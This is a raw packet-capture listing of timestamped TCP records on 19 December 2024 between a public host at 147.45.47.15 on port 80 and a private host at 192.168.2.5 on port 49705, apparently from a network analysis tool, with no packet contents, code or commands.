                                                                                                  Dec 19, 2024 08:52:55.315202951 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.315253973 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.317189932 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.317303896 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.317352057 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.319495916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.319583893 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.319645882 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.391565084 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.391587019 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.391603947 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.391621113 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.391681910 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.391725063 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.392144918 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.392283916 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.392335892 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.393661022 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.393781900 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.393835068 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.395432949 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.395581961 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.395639896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.397167921 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.397284985 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.397341967 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.398870945 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.398983955 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.399039984 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.400599003 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.400726080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.400783062 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.402297974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.402410984 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.402510881 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.403927088 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.404098988 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.404170990 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.405575991 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.405692101 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.405744076 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.407427073 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.407463074 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.407519102 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.408863068 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.409003973 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.409065008 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.410427094 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.410774946 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.410842896 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.414757013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.414809942 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.414861917 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.414895058 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.414921045 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.414952040 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.415421009 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.415585995 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.415637016 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.416996956 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.417179108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.417233944 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.418412924 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.418584108 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.418631077 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.420010090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.420190096 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.420243025 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.421180964 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.421305895 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.421361923 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.422683954 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.422852993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.422918081 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.424164057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.424287081 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.424339056 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.425632954 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.425743103 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.425813913 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.427090883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.427213907 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.427284956 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.428563118 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.428666115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.428715944 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.430013895 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.430146933 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.430197954 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.431441069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.431561947 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.431615114 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.432929993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.433047056 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.433095932 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.434314013 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.434436083 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.434487104 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.435703039 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.435807943 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.435930014 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.437098026 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.437319994 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.437374115 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.438513041 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.438635111 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.438689947 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.439918995 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.440028906 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.440079927 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.443519115 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.443557978 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.443608999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.443609953 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.443644047 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.443691015 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.444638014 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.444675922 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.444729090 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.445920944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.445957899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.446033001 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.447196960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.447384119 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.447437048 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.448438883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.448635101 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.448687077 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.449915886 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.450051069 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.450095892 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.451241016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.451262951 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.451306105 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.452517033 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.452672958 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.452725887 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.453857899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.454185963 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.454237938 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.455370903 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.455389977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.455437899 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.456753016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.456903934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.456969023 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.457699060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.457791090 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.457834005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.459084034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.459265947 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.459330082 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.460458040 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.460576057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.460627079 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.461841106 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.462061882 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.462105989 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.463171005 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.463291883 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.463339090 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.464570999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.464675903 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.464721918 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.466058969 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.466167927 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.466214895 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.467305899 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.520207882 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.582771063 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.582845926 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.582911015 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.583158016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.583268881 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.583321095 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.584208965 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.584799051 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.584847927 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.585249901 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.585411072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.585455894 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.586215019 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.586285114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.586328983 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.587153912 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.587246895 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.587296963 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.588150978 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.588275909 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.588356018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.589086056 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.589234114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.589281082 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.590076923 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.590189934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.590266943 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.591025114 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.591099024 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.591147900 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.592027903 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.592133045 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.592185974 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.592947960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.593065023 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.593122005 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.593907118 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.594039917 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.594083071 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.594907999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.595016956 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.595057964 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.595873117 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.595977068 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.596019983 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.596828938 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.596935987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.596982002 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.597822905 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.597938061 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.597982883 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.598767042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.598972082 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.599020004 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.599724054 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.599864960 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.599911928 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.600688934 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.600882053 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.600954056 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.601659060 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.601741076 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.601783991 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.602657080 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.602767944 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.602812052 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.603593111 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.603735924 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.603787899 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.604624987 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.604690075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.604734898 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.605551004 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.605669975 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.605717897 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.606513977 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.606617928 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.606662035 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.607479095 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.607578993 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.607621908 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.608437061 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.608556032 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.608623028 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.609395981 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.609524012 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.609568119 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.610373974 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.610635042 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.610678911 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.611361027 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.611465931 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.611532927 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.612337112 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.612472057 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.612514019 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.613262892 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.613393068 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.613435984 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.614218950 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.614373922 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.614427090 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.615423918 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.615483999 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.615535975 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.616172075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.616291046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.616338015 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.617120028 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.617253065 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.617305994 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.618096113 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.618210077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.618266106 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.619097948 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.619194031 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.619307995 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.620093107 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.620157003 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.620213985 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.621031046 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.621154070 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.621202946 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.622067928 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.622334003 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.622416019 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.622978926 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.623089075 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.623140097 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.623933077 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.624088049 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.624138117 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.624979973 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.625044107 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.625096083 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.625937939 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.626065016 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.626117945 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.626827955 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.627063990 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.627120018 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.627866983 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.627932072 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.627985001 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.628782034 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.628875017 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.628922939 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.629422903 CET4970580192.168.2.5147.45.47.15
                                                                                                  Dec 19, 2024 08:52:55.629722118 CET8049705147.45.47.15192.168.2.5
                                                                                                  Dec 19, 2024 08:52:55.629823923 CET8049705147.45.47.15192.168.2.5
